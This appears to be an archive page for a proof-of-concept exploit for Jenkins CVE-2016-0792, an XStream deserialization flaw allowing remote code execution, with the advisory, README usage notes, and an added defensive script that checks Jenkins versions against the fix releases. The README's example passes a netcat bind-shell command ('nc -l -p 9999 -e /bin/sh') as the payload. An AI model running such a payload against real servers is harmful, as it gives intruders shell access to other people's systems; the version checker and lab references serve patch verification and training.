
CVE-2016-0792 PoC — CloudBees Jenkins CI and LTS Arbitrary Code Execution Vulnerability

Associated Vulnerability
Title: CloudBees Jenkins CI and LTS Arbitrary Code Execution Vulnerability (CVE-2016-0792)
Description: Multiple unspecified API endpoints in Jenkins before 1.650 and LTS before 1.642.2 allow remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.
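The advisory above fixes the bug in two release lines at once (weekly 1.650 and LTS 1.642.2), which makes a naive "is version < 1.650" check wrong for LTS installs. The following added example, not part of the PoC or of this archive page, classifies a Jenkins version string against both fix boundaries for inventory or patch-verification purposes; the `X-Jenkins` response header is where Jenkins reports its version, and the sample header values are constructed.

```python
"""Classify a Jenkins version against the CVE-2016-0792 fix releases.

Added example, not code from the exploit or the archive page. Weekly releases
carry two numeric components (1.649); LTS releases carry three (1.642.1).
Sample header values below are constructed for illustration; nothing here
touches the network.
"""
from typing import Dict, Optional, Tuple

FIXED_WEEKLY = (1, 650)      # Jenkins before 1.650 is affected
FIXED_LTS = (1, 642, 2)      # Jenkins LTS before 1.642.2 is affected


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Turn '1.642.2' into (1, 642, 2); return None for anything non-numeric."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        return None
    return tuple(int(p) for p in parts)


def is_lts(version: Tuple[int, ...]) -> bool:
    """LTS builds have a third component (1.642.2); weekly builds (1.649) do not."""
    return len(version) == 3


def is_affected(text: str) -> Optional[bool]:
    """True if the version predates the fix for its release line, False if it
    is at or past the fix, None if the string could not be parsed."""
    version = parse_version(text)
    if version is None:
        return None
    if is_lts(version):
        return version < FIXED_LTS
    return version < FIXED_WEEKLY


def version_from_headers(headers: Dict[str, str]) -> Optional[str]:
    """Jenkins advertises its version in the X-Jenkins response header
    (header names are matched case-insensitively)."""
    for name, value in headers.items():
        if name.lower() == "x-jenkins":
            return value
    return None


# Constructed sample of response headers an inventory script might record.
SAMPLE_HEADERS = {"Server": "Jetty(9.2.z-SNAPSHOT)", "X-Jenkins": "1.642.1"}

if __name__ == "__main__":
    found = version_from_headers(SAMPLE_HEADERS)
    print(f"version {found}: affected={is_affected(found)}")
```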
Description
Exploit for Jenkins serialization vulnerability - CVE-2016-0792
Readme
# Jenkins CVE-2016-0792
## Exploit for Jenkins serialization vulnerability - CVE-2016-0792

#### Exploit database

[https://www.exploit-db.com/exploits/42394/](https://www.exploit-db.com/exploits/42394/)

#### More information can be found here

1. [Contrast Security](https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream)

2. [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)

#### Requirements

1. Python 3.6.x

2. [requests](http://docs.python-requests.org/en/master/) library is required for this exploit to work

      `sudo pip install requests`

#### Usage

`python3`

`from exploit import exploit`

`exploit(url, command)`

where `url` is the URL of the Jenkins server and `command` is the command to execute.

##### Example

`exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')`

This runs nc on the vulnerable machine, listening on port 9999.

For demonstration purposes I will be running the ISO from [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/).

[![asciicast](https://asciinema.org/a/131436.png)](https://asciinema.org/a/131436)

#### Disclaimer
Using this software to attack targets without permission is illegal. I am not responsible for any damage caused by using this software against the law.